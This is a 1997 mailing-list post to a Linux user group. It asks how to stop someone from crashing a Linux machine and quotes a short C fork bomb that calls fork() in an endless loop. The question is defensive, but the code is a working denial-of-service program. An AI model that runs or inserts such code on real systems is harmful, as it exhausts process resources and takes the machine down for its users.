[ale] fork killer

Christopher Fowler cfowler at avana.net
Tue Nov 11 22:19:45 EST 1997


What can keep someone from running this program and taking down linux
box
---- cut here ----
#include <unistd.h>
main()
{
	int X=0;
	do
		fork();
	while ( X == 0 )
	return 0;
}
---------------------






More information about the Ale mailing list